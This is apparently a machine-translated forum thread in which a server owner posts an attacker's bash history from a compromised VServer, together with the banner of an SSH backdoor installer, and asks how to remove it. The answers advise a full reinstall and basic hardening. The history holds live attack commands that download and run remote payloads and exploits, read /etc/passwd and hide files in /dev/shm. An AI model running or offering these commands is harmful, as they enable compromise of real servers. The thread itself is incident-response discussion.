Backdoor de SSH encontrado no VServer. O que fazer?

Navegue suas respostas
24

Ontem, verifiquei meu histórico de comandos no meu VServer. Eu encontrei várias linhas suspeitas. 

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

Especialmente o sniffer.tgz me chocou. Eu configurei uma máquina virtual e baixei este arquivo tgz. Eu comecei a configuração e isso me deu estas linhas: 

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

Alguém sabe como remover isso?

    
por itskajo 05.03.2018 / 20:39

2 respostas

67

Isto é o que você deve fazer em todos os sistemas que você teve este sniffer.tgz em: Nuke Eles De Orbit imediatamente , e começar de novo de um limpo instalação. (Ou seja, destruir o (s) sistema (s), reinstalar dados de carga limpos de backups de limpar - supondo que você tenha backups limpos e, em seguida, endureça o (s) sistema (s) antes de colocá-los de volta Internet).

Sempre que você tiver malware ou hackers entrando no sistema desse jeito, é hora de analisar novamente como o sistema está configurado e não repetir as mesmas etapas com as quais entraram. Mas, como isso pode não ser um sistema que você pode anular e analisar forense, e como esse pode ser seu único servidor, é hora de apenas destruir o sistema virtual e recomeçar do zero. (como eu disse acima).

(E isso se aplica a qualquer situação em que você recebe malware no sistema. A menos que você tenha hardware sobressalente para substituir algo assim para isolar e examinar forense o sistema violado, que geralmente a maioria dos usuários não tem, você tem não há escolha a não ser bombardear o sistema e começar de novo.)

Sem analisar o seu servidor, não posso realmente dizer o que você fez de errado, mas é provável que esse backdoor esteja mais fundo no sistema do que apenas um simples 'programa' instalado. E como os malvados já conseguiram instalar um backdoor no seu sistema, você pode assumir que todas as suas senhas agora estão violadas e não estão mais seguras (seja para SSH, MySQL, ou qualquer outro tipo de senha que tenha EVER). introduzido neste sistema informático). Hora de mudar todas suas senhas!

Depois que você fizer o backup em um ambiente limpo, veja algumas dicas básicas sobre as etapas de proteção a serem consideradas. Note que, como isso torna o tópico muito mais amplo, não consigo detalhar os detalhes aqui, mas é hora de fazer algumas etapas de proteção para proteger seu sistema:

  1. Ativar um firewall e permitir somente o acesso a portas que precisam ser abertas . ufw existe para ser simples, então vamos usar isso. %código%. (Configurar sudo ufw enable adequadamente para o seu ambiente é uma história diferente, e isso vai além dos limites desta questão.)

  2. Restringir o acesso ao SSH remoto . Isso nem sempre é factível, mas você idealmente identifica os endereços IP que pertencem a você e, especificamente, os coloca na lista de permissões no firewall. (Se você estiver em um endereço IP residencial dinâmico, pule esta etapa).

  3. Bloqueie o acesso SSH ao seu servidor e exija o uso de chaves SSH somente para autenticação . Desta forma, os hackers não podem atacar o seu servidor e tentar apenas adivinhar senhas. É muito mais difícil adivinhar a chave privada adequada (porque você teria que obrigar a força bruta a todos eles), e isso ajuda a proteger contra ataques de força bruta.

  4. Se você estiver executando um website, certifique-se de bloquear as permissões para que as pessoas não possam fazer upload / executar coisas quando desejarem . Fazendo isso varia de site para site, então eu não posso te dar mais orientações aqui (é impossível fazê-lo).

  5. Além disso, se você estiver usando um site usando Joomla ou Wordpress, certifique-se de manter o ambiente atualizado e corrigido com as vulnerabilidades de segurança dos provedores de software .

  6. Sempre que possível, configure, configure e use métodos de autenticação de dois fatores (2FA) para os itens que você autentica com . Existem muitas soluções para autenticação de segundo fator para diferentes aplicativos, e proteger vários aplicativos dessa maneira está além do escopo deste post, portanto, você deve fazer sua pesquisa sobre este ponto antes de escolher uma solução.

  7. Se você precisar usar senhas em sua configuração, use um gerenciador de senhas decente (as baseadas em nuvem não são necessariamente boas escolhas) e use caracteres longos (mais de 25 caracteres), senhas aleatórias e memoráveis que são diferentes para cada item individual que está sendo protegido por senhas (daí a recomendação para o gerenciador de senhas). (No entanto, você deve considerar NÃO usar senhas quando possível (como para autenticação SSH) e usar 2FA sempre que possível).

por Thomas Ward 05.03.2018 / 21:02
0

Se houver um backdoor, há mais 3. Isole, faça backup de dados, faça nuke e restaure cuidadosamente os dados. Tenha cuidado com os dados de qualquer cron, php ou até mesmo do mysql, todos eles podem ficar comprometidos. Lembre-se, neste momento, eles têm todas as suas senhas e hashes, então se outras máquinas configuradas de forma semelhante, elas provavelmente também as hackearam ... A parte difícil é imaginar como elas entraram para começar. Se você tem o WordPress, procure por malware em plugins / temas, etc ... Verifique suas permissões, você pode ter 777 em todos os lugares. Nenhuma resposta simples, você está olhando muito trabalho.

    
por tony lester 06.03.2018 / 23:57

Tags

segue um arquivo de log, mas mostra apenas linhas específicas Como abro uma pasta como root?